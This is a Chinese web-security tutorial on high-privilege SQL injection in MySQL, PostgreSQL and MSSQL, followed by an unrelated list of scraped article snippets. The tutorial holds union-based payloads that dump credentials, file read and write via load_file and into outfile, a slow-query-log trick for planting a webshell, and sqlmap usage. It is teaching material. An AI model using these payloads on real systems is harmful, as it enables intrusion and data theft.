PT_silver
PT_silver

25、WEB攻防——通用漏洞&SQL读写注入&MYSQL&MSSQL&PostgreSQL

文章目录

  • Mysql-root高权限读写注入
  • PostgreSQL——dba高权限读写注入
  • Mssql-sa高权限读写注入

25、WEB攻防——通用漏洞&SQL读写注入&MYSQL&MSSQL&PostgreSQL_第1张图片
25、WEB攻防——通用漏洞&SQL读写注入&MYSQL&MSSQL&PostgreSQL_第2张图片
25、WEB攻防——通用漏洞&SQL读写注入&MYSQL&MSSQL&PostgreSQL_第3张图片

Access无高权限注入点——只能猜解,而且是暴力猜解;
MYSQL,PostgreSQL,MSSQL(SQL server)高权限注入点——可升级读写(文件)、(命令)执行等。

  • 所谓高权限注入点,指的就是在连接数据库时,所使用的用户(数据库连接用户)具有较高的权限。因为权限划分的缘故。
  • 如果存在高权限注入点,所做的不仅仅是查看数据库的内容,还可以是文件上传、命令执行。

Mysql-root高权限读写注入

  • 读文件(命令行)
    数据库可以调用自身的函数load_file('')读取服务器上的文件。payload:select load_file('')
    25、WEB攻防——通用漏洞&SQL读写注入&MYSQL&MSSQL&PostgreSQL_第4张图片

  • 写文件(命令行)
    有关函数:outfile()dumpfile()。paylaod:select 'file_content' into outfile ''
    在这里插入图片描述

  • 读文件:union select 1,load_file('d:/w.txt'),3 --+

    在实战中,一般读取数据库配置文件、网站搭建性文件。具体读哪些文件,可以参考load_file 常用路径

    • 获取网站路径方式1:读取中间件的配置文件,例如phpstudy的vhosts.conf文件
      25、WEB攻防——通用漏洞&SQL读写注入&MYSQL&MSSQL&PostgreSQL_第5张图片

    • 获取网站路径方式2:phpinfo()
      25、WEB攻防——通用漏洞&SQL读写注入&MYSQL&MSSQL&PostgreSQL_第6张图片

    • 获取网站路径方式3:报错
      在这里插入图片描述

  • 写文件:union select 1,'xxx',3 into outfile 'd:/www.txt' --+

会出现有高权限注入点,但是无法读取写入文件的情况——secure-file-priv参数
secure-file-priv参数有三种情况:

  • secure-file-priv=null,不允许读写;
  • secure-file-priv=/tmp/,读写只能发生在tmp目录下;
  • secure-file-priv= ,读写不做限制。
    25、WEB攻防——通用漏洞&SQL读写注入&MYSQL&MSSQL&PostgreSQL_第7张图片

突破方法

  • 注入点需要支持SQL执行环境,若没有就需要借助phpmyadmin或能够直接连上那个对方数据库进行绕过。payload:
    set global slow_query_log=1; //启用慢日志
set global slow_query_log_file='shell网站路径';  //保存慢日志的路径,便于用浏览器可以进行访问
select '' or sleep(11);
  • 支持堆叠注入

PostgreSQL——dba高权限读写注入

# 测列数
order by 4

# 测回显位
and 1=2 union select 'null',null,null //没报就没有,换下一个
and 1=2 union select null,'null',null //爆出null

# 获取信息
and 1=2 union select null,version(),null // 获取当前数据库版本
and 1=2 union select null,current_user,null //获取当前用户
and 1=2 union select null,current_database(),null //获取当前数据库名

# 获取所有数据库名
and 1=2 union select null,string_agg(datname,','),null from pg_database

# 获取表名
1. and 1=2 union select null,string_agg(tablename,','),null from pg_tables where schemaname='public'
2. and 1=2 union select null,string_agg(relname,','),null from pg_stat_user_tables

# 获取字段名
and 1=2 union select null,string_agg(column_name,','),null from information_schema.columns where table_name='reg_users'

# 读取数据
and 1=2 union select null,string_agg(name,','),string_agg(password,','),null from reg_users

-----
# 获取DBA用户(PostgreSQL中的root用户)
and 1=2 union select null,string_agg(username,','),null from pg_user where usesuper is true

参考postgresql注入

Mssql-sa高权限读写注入

# 测字段数
order by 4

# 测回显位
and 1=2 union all select 'null',null,null //用单引号包裹null,若该位置存在回显位,则页面爆出null

# 获取信息
@@version //获取版本信息
db_name() //当前数据库名字
user,system_user,current_user,user_name //获取当前用户名,四种查询方式
@@SERVERNAME //获取服务器主机信息
and 1=2 union all select null,db_name(),null

# 查表名
and 1=2 union all select null,(select top 1 name from <数据库名>.dbo.sysobjects where xtype='u'),null
and 1=2 union all select null,(select top 1 name from <数据库名>.dbo.sysobjects where xtype='u' and name not in ('manage'(第一个表名))),null //查其他表

# 查字段名
and 1=2 union all select null,(select top 1 col_name(object_id('manage'),1) from sysobjects),null
and 1=2 union all select null,(select top 1 col_name(object_id('manage'),2) from sysobjects),null

# 查字段内容
and 1=2 union all select null,username,null from manage

使用sqlmap时,一般直接用sqlmap发数据包。讲数据包保存在txt文件中,在参数后面加*告诉sqlmap,你要在这进行注入。
25、WEB攻防——通用漏洞&SQL读写注入&MYSQL&MSSQL&PostgreSQL_第8张图片
payload:python sqlmap.py -r 1.txt

25、WEB攻防——通用漏洞&SQL读写注入&MYSQL&MSSQL&PostgreSQL_第9张图片
sql使用手册

你可能感兴趣的:(小迪安全,前端,sql,mysql)

  • 大厂Java面试题:MyBatis是如何进行分页的?分页插件的实现原理是什么? 技术范王有志 大厂Java面试题mybatisjava面试后端
    大家好,我是王有志。今天给大家带来的是一道来自京东的关于MyBatis实现分页功能的面试题:MyBatis是如何进行分页的?分页插件的实现原理是什么?通常,分页的方式可以分为两种:逻辑(内存)分页物理分页逻辑(内存)分页指的是数据库返回全部符合条件的数据,然后再通过程序代码对数据结果进行分页处理;物理分页指的是通过SQL语句查询,由数据库返回分页后的查询结果。逻辑(内存)分页和物理分页各有优缺点,
  • Java 上传读取Excel文件 Ben_1043556915 Java进阶javaservlet开发语言
    Web中導入Excel文件ExtJs前端代碼://=========上傳Excel=============================uploadPanel=newExt.form.FormPanel({fileUpload:true,id:'fileUploadForm',frame:true,labelAlign:'right',buttonAlign:'center',labelWid
  • NoSQL(非关系型数据库)之Redis 花狮66 nosqlredis数据库
    目录一、关系型数据库与非关系型数据库1.1关系型数据库1.2非关系型数据库1.3区别1.3.1数据存储方式不同1.3.2扩展方式不同1.4非关系型数据库产生背景二、Redis简介2.1Redis概述2.2Redis优点2.3Redis为什么这么快?总结一数据流向二各自特点一、关系型数据库与非关系型数据库1.1关系型数据库关系型数据库是一个结构化的数据库,创建在关系模型(二维表格模型)基础上,一般面
  • Mybatis 是如何进行分页的?分页插件的原理是什么? 骆梦晴 mybatismysqljava
    1)Mybatis使用RowBounds对象进行分页,也可以直接编写sql实现分页,也可以使用Mybatis的分页插件。2)分页插件的原理:实现Mybatis提供的接口,实现自定义插件,在插件的拦截方法内拦截待执行的sql,然后重写sql
  • 妙趣美食:下雨才见情人的眼泪!患洁癖的地皮儿,与炒蛋最配 爱家一品
    文/大侠范儿图/来源网络夏末之季,降雨频繁。恰逢明天要回老家一趟公干,心里早就有了隐隐的期盼,期待着和情人~的眼泪再度相逢。小的时候,大侠范儿生活在鲁西北的平原一个小小村落,那里承载了太多的人生百味,而其中很多愉悦的话题多是和美食相关。今天的故事主角,外形简直可以说像大鼻涕,却有着“情人的眼泪”这么美丽的名字,营养丰富,非雨后不可见。那些年,好像雨水特别充沛,连番降雨后总有很多的蘑菇,在人踩踏少的
  • 传奇内部号在什么网站申请 传奇内部号手游平台排行榜 诸葛村夫123
    要说现在游戏中,平民玩家能白嫖的福利确实不多,但是礼包兑换码是其一,内部号,内测号是其二,下面小编就来给大家汇总一下目前最好用的游戏平台有哪些?传奇内部号在什么网站申请传奇内部号手游平台排行榜排行榜第一:游人特权站官网-【目前拥有400多款游戏内部号的发放权】推荐指数:⭐⭐⭐⭐⭐游人特权站是大量游戏玩家的首选,其中最具代表性的就是内部号手游平台。它以多种多样的游戏玩法和丰富的游戏地图而受到众多玩家
  • MySQL添加用户、为用户分配权限 ChenyuMa
    添加用户1.允许本地访问的用户(127.0.0.1)createuserzhrt@localhostidentifiedby'123456';2.允许外网IP访问的用户createuser'zhrt'@'%'identifiedby'123456';用户分配权限授予用户在本地服务器对该数据库的全部权限grantallprivilegesondbname.*tozhrt@localhostident
  • MYSQL数据库的实验总结_MySQL数据库基础总结 weixin_39993623 MYSQL数据库的实验总结
    来源:实验楼链接:https://www.shiyanlou.com/courses/9一、开发准备#打开MySQL服务sudoservicemysqlstart#使用root用户登录,密码为空mysql-uroot二、查看数据库SHOWDATABASES三、新建数据库首先,我们创建一个数据库,给它一个名字,比如mysql_shiyan,以后的几次实验也是对mysql_shiyan这个数据库进行操
  • 2024年免费的微信红包封面序列号最新列表(库洛米,原神系列) 全网优惠分享君
    随着科技的不断发展,微信红包已经成为我们日常生活中不可或缺的一部分。每到节日、生日等特殊时刻,发送微信红包已经成为了人们表达祝福和关怀的一种常见方式。而微信红包封面作为红包的外观展示,更是增添了不少趣味性和个性化。在2024年,有一系列备受欢迎的微信红包封面序列号,其中包括库洛米和原神系列,这些序列号将为大家带来全新的红包体验。关注微信公众号:小云线报圈领取封面序列号,几千款可选(含库洛米,原神系
  • 冷门不起眼的暴利行业有哪些?违法吗? 古楼
    冷门不起眼的暴利行业有哪些?在我们的日常生活中,有些行业看似冷门、不起眼,但实际上却蕴含着巨大的商机和利润。下面就让我们一起来探讨一下这些神秘的暴利行业。俗话说多一个项目多一份收入,先给大家分享一个小编在做的网络项目,不用投资一分钱,只要淘宝、京东、拼多多、抖音、快手、唯品会等电商不倒,这个项目永久可做,而且收入稳定!网购你是直接下单吗?还是说用别人的口令和链接下单?千万不要这么做了,网购是可以领
  • 记忆深处的那个人(四十) 大脸猫8584
    虽然是聚会,但是因为是肖维丽生日,所以不免要准备一份小礼物。周淇去精品店挑了一条925纯银项链,水滴形状的吊坠,很好搭配衣服,价格也正是现在的自己能负担起的价格,周淇还挑了一张小卡片,亲手写上祝福:岁月无声、友情无言、生日快乐、勇往直前。其实之前大家的生日也都聚会,也会互送生日礼物,大都是音乐盒、娃娃之类的,那时候大家都向父母要生活费,礼物也都挑不太贵的,但是又都是女孩子普遍喜欢的小玩意,而如今大
  • 30岁的女性创业适合做些什么? 氧惠超好用
    创业是一种需要创业者及其创业搭档组织经营管理、运用服务、技术、器物作业的思考、推理和判断的行为。以下是小编为大家整理30岁的女性创业适合做些什么相关内容,仅供参考,希望能够帮助大家!家庭园艺DIY“小花农”是一种DIY产品(自动动手做的意思)。家庭园艺DIY产品在市场上的面孔比较新,但符合市场需求。譬如“小花农”看上去只是一个罐子,但是里面已经配好了种子、花泥、花肥,只要定时浇水,种子就开始发芽、
  • .NetCore+vue3上传图片 Multipart body length limit 16384 exceeded. 鱼是一只鱼啊 Vue后端.netcore图片上传vue3el-upload
    实现目标。点击图片上传头像效果图前端部分图片上传关键代码更换头像上传js部分import{ref,reactive,onMounted}from"vue";import{uploadAvatar}from"../../api/auth";import{ElMessage}from"element-plus";exportdefault{setup(){constfit=ref("cover");c
  • 米宝,亲妈妈一口 孟苏先生
    秋后半晌,阳光暖暖地照着,跟米宝在门口的空地上看鸽子,说是看鸽子,其实一会看看房檐上的小鸟,一会哄哄路过的小狗,我蹲在地上看着米宝时而升起他的小胳膊嘴里发着“嘘,嘘”的声音学着我的样子撵鸟,一会听见鸽子咕咕叫就又向鸽子跑去的样子,心里就爱他爱得不得了然后待他再一次跑向我的时候我说:“米宝,亲妈妈一口。”他看了我一下,笑了,然后听见鸽子咕咕叫就跑向鸽子了,可是跑了没几步,回头看看我又跑了回来,一只手
  • (最新章节目录)--《四海狂才》赵凡余小艾--(全文免费阅读) 海边书楼
    (最新章节目录)--《四海狂才》赵凡余小艾--(全文免费阅读)主角:赵凡余小艾简介:真正的富豪,从不炫耀他所拥有的一切,包括金钱,女人,权利。只有土豪才会用钱武装自己,并且大张旗鼓的炫耀。一个近乎现实的梦境,让赵凡重生了,人活一世,要么碌碌无为,要么轰轰烈烈,梦醒后,他选择了后者!!关注微信公众号【寒风书楼】去回个书号【223】,即可阅读【四海狂才】小说全文!赵凡一愣,鬼使神差的走上前,这时少妇却
  • 联合唯一索引其中一个为Null,多条同样的数据为什么不会冲突 Amagi. 数据库开发语言
    在数据库中,联合唯一索引(CompositeUniqueIndex)是由两个或多个列组合而成的主键,用于唯一标识表中的每一行。当一个联合唯一索引的某个字段为NULL时,涉及到的关键问题在于,NULL值的唯一性是不同于其他值的。1.NULL的语义在SQL中,NULL被认为是“未知”的而非简单的空值。在大多数数据库管理系统(DBMS)中,NULL值的比较结果是“未知”,并且两个NULL被认为是不同的。
  • 【0224读书清单】情商是什么?之九 李不乖
    001接受帮助并不丢脸向他人求助,其实既能解决自己的问题,也能开拓人际关系。面对真诚的请求,大多数人都不会拒绝,所以不要有太多顾忌。002柔能克刚女性可以坚强果断,但是不宜太过刚强,失去了女性的柔美。有时候,柔和比强硬更能解决问题。003保持距离和城府深的人,尤其是工于心计的人交往,要小心提防,谨言慎行,也不要自视聪明,借口对方的内心。还是保持安全距离的好。004把握界限和性格孤僻的人交往,要照顾
  • MyBatis如何实现分页 思静语 #Mybatismybatis
    文章目录MyBatis分页方式对比使用数据库厂商提供的分页查询语句通过自定义SQL实现分页逻辑1.使用RowBounds实现分页2.使用PageHelper实现分页数组分页使用MyBatis-Plus进行分页MyBatis物理分页和逻辑分页MyBatis手写一个拦截器分页在MyBatis中实现分页通常有两种方式:使用数据库厂商提供的分页查询语句(如MySQL的LIMIT)或者通过自定义SQL来实现
  • 小敏呀 胖鹅呀
    又是怒吼,像老师拿着厚尺欺上手心!霎时唤起小时候全身过敏的惊惧来,她得逃!她在想。声音在打架,小敏小跑着找了间最远的房间关上了门;惊惧至极,声音像是要打进那扇门来,她牢牢地握住手中的玩具,一动不动地蹲着,似乎在努力让自己看起来较这周围正常一些。小敏嗅着空气中破碎瓷碗的气息,低头努力玩着弹珠。那一声轰隆的摔门声以后,再也没有什么声音了。她可怕,再有什么声音,会震掉她屏息噙住的泪珠子。她蹲着在那静静地
  • 鞠婧祎:曾遭遇数月之久的群嘲,今新剧《嘉南传》大受好评 慕容小微
    2012年,18岁的鞠婧祎参加了女生派成都地区的竞选,并在比赛中被评选为人气美女。次年,鞠婧祎听说丝芭在选拔女团成员,她也兴冲冲地报了名。但是当她看到会议厅里坐着很多穿着粉色系小裙子,说话都是娇嗲地吐出软糯之音的女选手之后,她打了退堂鼓:我完蛋了,我还是走吧。于是鞠婧祎就象走过场似地说完自我介绍后就走了。没承想,正跟朋友吃着饭呢,一通电话进来了:你的初审过了,你需要回来一下。就这样,鞠婧祎成为了女
  • 外甥女 出淤泥而不染N
    时间过得真快,转眼外甥女都一岁了,相当初外甥女刚生下来的时候正是家里农活最忙的时候,母亲要去上地,没时间管小外甥女,小外甥女的重任就落在了还没有出月子的妹妹身上,记得当时小外甥女比较闹腾爱哭,妹妹舍不得孩子哭一下,成天抱在怀里哄,那个时候看着妹妹真辛苦。现在外甥女虽然长大不在哭了,但是她特别喜欢黏着妹妹,只要妹妹在谁都别想抱走她,每次我想抱她只能哄她说,跟姨妈看狗去,她就伸出小手让我抱,然后我抱着
  • 幸福清单/让自己变快乐的20件小事 林清子
    作家毕淑敏说:“你不要总希冀轰轰烈烈的幸福,它多半只是悄悄地扑面而来。”每个人都渴望幸福,但幸福生活的秘诀就掌握在我们自己手中。提升幸福感的20个小妙招送给你,让你开心快乐每一天。01.每天坚持记录开心的事从今天开始,每天记下让你开心的两件小事。哪怕只是有人夸你今天的起色好看,哪怕是夸你今天做的饭菜好吃我们习惯了盯着焦虑和不好的事情,所以总感觉生活特别糟糕。从今天起,多记住那些生活中细碎的美好和小
  • 给你最合适的爱 顾小米mi
    其实主要是想和大家分享几个小育儿知识。事情是这样的,旺先森也参加了人生中第一次家长会,因为不能带孩子参加,又是晚上,所以,我只能很遗憾的缺席了,不过旺先森回家之后全部向我转达,并对我说,受益匪浅。一、不要错过孩子的敏感期孩子在六岁之前有无数个敏感期,而每一个敏感期都会对某一项技能的发展有着重要的作用。像忆儿现在属于手口敏感期,爱扔东西,就简单的扔东西这件事情来讲,你的态度对孩子未来的性格发展有着重
  • 每日小短句 蠢屁儿
    教师之所以伟大,在于他(她)永远消耗自己,照亮别人。教师·赞美老师宁静的夜晚,只有那天上的星星正在窃窃私语。山坡上,大路边,村子口,榛树叶子全都红了,红得像一团团火,把人们的心也给燃烧起来了。春天像一位画家,尽情地挥动着画笔,打扮着祖国各地。春天·春天它脱下破旧的外衣,又开始新的生活;它贪婪地吮吸着春天那清新、甜润的露珠儿,慢慢地长出逗人喜爱的嫩枝绿叶。荷塘里的荷花都羞涩地打着朵。秋天到了,树上金
  • 48岁“美女”和24岁小伙凌晨裸聊,让人目瞪口呆…… 文玩文案狙击手
    12月4号凌晨3点,南昌24岁的小帅(化名)醒来后睡不着,为了寻求刺激,在某交友软件找,一个叫“雾里看花”的“美女”聊天对方很主动,说想和小帅来一场视频裸聊,小帅大为激动,没想到真的有艳遇,想想这么多年了,终于实现了一回“梦想”这时,对方发来了一个“XX房”的APP,要求小帅在平台上给自己先点个赞据小帅回忆,点击链接下载的这款“XX房”App后,打开APP时弹出了一个访问通讯录的提示,当时太激动了
  • MySQL 大小写问题 天珩 今日所得
    场景在做mysql查询的时候,注意到一个问题,mysql默认是不区分大小写的通过简单的查询,发现通过关键字binary可以强制区分大小写参考每日所得--分页查询优化和mysql区分大小写问题那为什么MySQL不区分大小写呢参考文档mysql不区分大小写技术原理文章总结1、是否区分是取决于字符集和校对(Collation)部分所做的工作2、取决于字符集中是否声明了大小写敏感声明之后,开销增加参考ht
  • css之雪碧图(精灵图) 星月心城 csscss前端
    听到雪碧图是不是跟我一样,啥?雪碧图?不知所以。如果一张大图由许多小图构成,那么每张小图都需要进行网络请求,这样一来就会有很多请求,为了减少网络请求,雪碧图就出现了。雪碧图(Sprite)是一种在Web开发中常用的图像合并技术,将多个小图标或图片合并成一张大图,然后通过CSS来显示其不同部分。这种技术可以减少HTTP请求数量,提高网页加载速度。以下是本人自己写的例子,大图的图片是在百度找的http
  • 【共成长第279天】跳广场舞 幸福笑颜
    玩与成长:—❀跳广场舞❀—晚餐后,一家外出散步。小区的广场上热闹非凡,已经有好几拨活动在进行。其中之一就是广场舞。外婆加入了广场舞,Ethan则在一旁飞奔一圈后,被热闹的广场舞音乐吸引,驻足于音箱前。音乐声音实在太大,为了保护宝贝的听力,妈咪牵着宝贝走到一旁的空地上,看大伙儿跳舞。发现:来到空地后,Ethan听着音乐,暂时停止奔跑,在妈咪的要求下,认真地看了一会儿大家跳舞。就在妈咪放开手的瞬间,小
  • 家庭教育小分享 85691f910e56
    父母是孩子的镜子,孩子是父母的影子,家长一步错,孩子就会步步错这6种父母不合格一对好父母,胜过200个好老师。父母的教育是无价的,是孩子终身幸福的根基。然而在教育孩子的路上,为人父母,漫漫求索,苦心孤诣,却还是难免会出错,一不小心成为不合格父母。各位家长,请不要做下面这六种父母:1、过度溺爱型父母:把孩子放在第一位,满足孩子一切要求,对孩子犯的错误视而不见。2、过于忙碌型父母:以为赚到钱给孩子最好
  • 华山一日游旅游攻略 卖小伙子的姑凉
    华山以险、奇位居五岳之一。自古华山一条路,顾名思义,不管你是上山还是下山都是一条路。图片发自App我和朋友刚从华山回来,以自己的亲身经历这下这边华山攻略,希望能给各位想去华山玩的朋友们提供一点参考意见。华山可以24小时登山,旺季门票价格是160元,学生证半票80元,有效期为一天。根据自己的情况可以选择夜爬或者白天登山。我和我朋友因为都是妹子,考虑到体力和安全方面的问题,选择的是白天登山。登山的路线
  • ztree异步加载 3213213333332132 JavaScriptAjaxjsonWebztree
    相信新手用ztree的时候,对异步加载会有些困惑,我开始的时候也是看了API花了些时间才搞定了异步加载,在这里分享给大家。 我后台代码生成的是json格式的数据,数据大家按各自的需求生成,这里只给出前端的代码。 设置setting,这里只关注async属性的配置 var setting = { //异步加载配置
  • thirft rpc 具体调用流程 BlueSkator 中间件rpcthrift
    Thrift调用过程中,Thrift客户端和服务器之间主要用到传输层类、协议层类和处理类三个主要的核心类,这三个类的相互协作共同完成rpc的整个调用过程。在调用过程中将按照以下顺序进行协同工作:         (1)     将客户端程序调用的函数名和参数传递给协议层(TProtocol),协议
  • 异或运算推导, 交换数据 dcj3sjt126com PHP异或^
    /* * 5 0101 * 9 1010 * * 5 ^ 5 * 0101 * 0101 * ----- * 0000 * 得出第一个规律: 相同的数进行异或, 结果是0 * * 9 ^ 5 ^ 6 * 1010 * 0101 * ---- * 1111 * * 1111 * 0110 * ---- * 1001
  • 事件源对象 周华华 JavaScript
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml&q
  • MySql配置及相关命令 g21121 mysql
            MySQL安装完毕后我们需要对它进行一些设置及性能优化,主要包括字符集设置,启动设置,连接优化,表优化,分区优化等等。           一 修改MySQL密码及用户      
  • [简单]poi删除excel 2007超链接 53873039oycg Excel
          采用解析sheet.xml方式删除超链接,缺点是要打开文件2次,代码如下:      public void removeExcel2007AllHyperLink(String filePath) throws Exception { OPCPackage ocPkg = OPCPac
  • Struts2添加 open flash chart 云端月影
    准备以下开源项目: 1. Struts 2.1.6 2. Open Flash Chart 2 Version 2 Lug Wyrm Charmer (28th, July 2009) 3. jofc2,这东西不知道是没做好还是什么意思,好像和ofc2不怎么匹配,最好下源码,有什么问题直接改。 4. log4j 用eclipse新建动态网站,取名OFC2Demo,将Struts2 l
  • spring包详解 aijuans spring
    下载的spring包中文件及各种包众多,在项目中往往只有部分是我们必须的,如果不清楚什么时候需要什么包的话,看看下面就知道了。 aspectj目录下是在Spring框架下使用aspectj的源代码和测试程序文件。Aspectj是java最早的提供AOP的应用框架。 dist 目录下是Spring 的发布包,关于发布包下面会详细进行说明。 docs&nb
  • 网站推广之seo概念 antonyup_2006 算法Web应用服务器搜索引擎Google
       持续开发一年多的b2c网站终于在08年10月23日上线了。作为开发人员的我在修改bug的同时,准备了解下网站的推广分析策略。     所谓网站推广,目的在于让尽可能多的潜在用户了解并访问网站,通过网站获得有关产品和服务等信息,为最终形成购买决策提供支持。     网站推广策略有很多,seo,email,adv
  • 单例模式,sql注入,序列 百合不是茶 单例模式序列sql注入预编译
      序列在前面写过有关的博客,也有过总结,但是今天在做一个JDBC操作数据库的相关内容时 需要使用序列创建一个自增长的字段  居然不会了,所以将序列写在本篇的前面    1,序列是一个保存数据连续的增长的一种方式; 序列的创建; CREATE SEQUENCE seq_pro 2 INCREMENT BY 1 -- 每次加几个 3
  • Mockito单元测试实例 bijian1013 单元测试mockito
    Mockito单元测试实例: public class SettingServiceTest { private List<PersonDTO> personList = new ArrayList<PersonDTO>(); @InjectMocks private SettingPojoService settin
  • 精通Oracle10编程SQL(9)使用游标 bijian1013 oracle数据库plsql
    /* *使用游标 */ --显示游标 --在显式游标中使用FETCH...INTO语句 DECLARE CURSOR emp_cursor is select ename,sal from emp where deptno=1; v_ename emp.ename%TYPE; v_sal emp.sal%TYPE; begin ope
  • 【Java语言】动态代理 bit1129 java语言
      JDK接口动态代理 JDK自带的动态代理通过动态的根据接口生成字节码(实现接口的一个具体类)的方式,为接口的实现类提供代理。被代理的对象和代理对象通过InvocationHandler建立关联   package com.tom; import com.tom.model.User; import com.tom.service.IUserService;
  • Java通信之URL通信基础 白糖_ javajdkwebservice网络协议ITeye
    java对网络通信以及提供了比较全面的jdk支持,java.net包能让程序员直接在程序中实现网络通信。 在技术日新月异的现在,我们能通过很多方式实现数据通信,比如webservice、url通信、socket通信等等,今天简单介绍下URL通信。 学习准备:建议首先学习java的IO基础知识   URL是统一资源定位器的简写,URL可以访问Internet和www,可以通过url
  • 博弈Java讲义 - Java线程同步 (1) boyitech java多线程同步
      在并发编程中经常会碰到多个执行线程共享资源的问题。例如多个线程同时读写文件,共用数据库连接,全局的计数器等。如果不处理好多线程之间的同步问题很容易引起状态不一致或者其他的错误。    同步不仅可以阻止一个线程看到对象处于不一致的状态,它还可以保证进入同步方法或者块的每个线程,都看到由同一锁保护的之前所有的修改结果。处理同步的关键就是要正确的识别临界条件(cri
  • java-给定字符串,删除开始和结尾处的空格,并将中间的多个连续的空格合并成一个。 bylijinnan java
    public class DeleteExtraSpace { /** * 题目:给定字符串,删除开始和结尾处的空格,并将中间的多个连续的空格合并成一个。 * 方法1.用已有的String类的trim和replaceAll方法 * 方法2.全部用正则表达式,这个我不熟 * 方法3.“重新发明轮子”,从头遍历一次 */ public static v
  • An error has occurred.See the log file错误解决! Kai_Ge MyEclipse
    今天早上打开MyEclipse时,自动关闭!弹出An error has occurred.See the log file错误提示! 很郁闷昨天启动和关闭还好着!!!打开几次依然报此错误,确定不是眼花了! 打开日志文件!找到当日错误文件内容: --------------------------------------------------------------------------
  • [矿业与工业]修建一个空间矿床开采站要多少钱? comsci
           地球上的钛金属矿藏已经接近枯竭...........        我们在冥王星的一颗卫星上面发现一些具有开采价值的矿床.....        那么,现在要编制一个预算,提交给财政部门..
  • 解析Google Map Routes dai_lm google api
    为了获得从A点到B点的路劲,经常会使用Google提供的API,例如 [url] http://maps.googleapis.com/maps/api/directions/json?origin=40.7144,-74.0060&destination=47.6063,-122.3204&sensor=false [/url] 从返回的结果上,大致可以了解应该怎么走,但
  • SQL还有多少“理所应当”? datamachine sql
    转贴存档,原帖地址:http://blog.chinaunix.net/uid-29242841-id-3968998.html、http://blog.chinaunix.net/uid-29242841-id-3971046.html! ------------------------------------华丽的分割线--------------------------------
  • Yii使用Ajax验证时,如何设置某些字段不需要验证 dcj3sjt126com Ajaxyii
    经常像你注册页面,你可能非常希望只需要Ajax去验证用户名和Email,而不需要使用Ajax再去验证密码,默认如果你使用Yii 内置的ajax验证Form,例如: $form=$this->beginWidget('CActiveForm', array(        'id'=>'usuario-form',&
  • 使用git同步网站代码 dcj3sjt126com crontabgit
    转自:http://ued.ctrip.com/blog/?p=3646?tn=gongxinjun.com   管理一网站,最开始使用的虚拟空间,采用提供商支持的ftp上传网站文件,后换用vps,vps可以自己搭建ftp的,但是懒得搞,直接使用scp传输文件到服务器,现在需要更新文件到服务器,使用scp真的很烦。发现本人就职的公司,采用的git+rsync的方式来管理、同步代码,遂
  • sql基本操作 蕃薯耀 sqlsql基本操作sql常用操作
    sql基本操作 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 2015年6月1日 17:30:33 星期一     &
  • Spring4+Hibernate4+Atomikos3.3多数据源事务管理 hanqunfeng Hibernate4
    Spring3+后不再对JTOM提供支持,所以可以改用Atomikos管理多数据源事务。Spring2.5+Hibernate3+JTOM参考:http://hanqunfeng.iteye.com/blog/1554251Atomikos官网网站:http://www.atomikos.com/   一.pom.xml <dependency> <
  • jquery中两个值得注意的方法one()和trigger()方法 jackyrong trigger
      在jquery中,有两个值得注意但容易忽视的方法,分别是one()方法和trigger()方法,这是从国内作者<<jquery权威指南》一书中看到不错的介绍 1) one方法     one方法的功能是让所选定的元素绑定一个仅触发一次的处理函数,格式为    one(type,${data},fn) &nb
  • 拿工资不仅仅是让你写代码的 lampcy 工作面试咨询
    这是我对团队每个新进员工说的第一件事情。这句话的意思是,我并不关心你是如何快速完成任务的,哪怕代码很差,只要它像救生艇通气门一样管用就行。这句话也是我最喜欢的座右铭之一。 这个说法其实很合理:我们的工作是思考客户提出的问题,然后制定解决方案。思考第一,代码第二,公司请我们的最终目的不是写代码,而是想出解决方案。 话粗理不粗。 付你薪水不是让你来思考的,也不是让你来写代码的,你的目的是交付产品
  • 架构师之对象操作----------对象的效率复制和判断是否全为空 nannan408 架构师
    1.前言。   如题。 2.代码。 (1)对象的复制,比spring的beanCopier在大并发下效率要高,利用net.sf.cglib.beans.BeanCopier Src src=new Src(); BeanCopier beanCopier = BeanCopier.create(Src.class, Des.class, false);
  • ajax 被缓存的解决方案 Rainbow702 JavaScriptjqueryAjaxcache缓存
    使用jquery的ajax来发送请求进行局部刷新画面,各位可能都做过。 今天碰到一个奇怪的现象,就是,同一个ajax请求,在chrome中,不论发送多少次,都可以发送至服务器端,而不会被缓存。但是,换成在IE下的时候,发现,同一个ajax请求,会发生被缓存的情况,只有第一次才会被发送至服务器端,之后的不会再被发送。郁闷。 解决方法如下: ① 直接使用 JQuery提供的 “cache”参数,
  • 修改date.toLocaleString()的警告 tntxia String
      我们在写程序的时候,经常要查看时间,所以我们经常会用到date.toLocaleString(),但是date.toLocaleString()是一个过时 的API,代替的方法如下:   package com.tntxia.htmlmaker.util; import java.text.SimpleDateFormat; import java.util.
  • 项目完成后的小总结 xiaomiya js总结项目
    项目完成了,突然想做个总结但是有点无从下手了。 做之前对于客户端给的接口很模式。然而定义好了格式要求就如此的愉快了。 先说说项目主要实现的功能吧 1,按键精灵 2,获取行情数据 3,各种input输入条件判断 4,发送数据(有json格式和string格式) 5,获取预警条件列表和预警结果列表, 6,排序, 7,预警结果分页获取 8,导出文件(excel,text等) 9,修
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他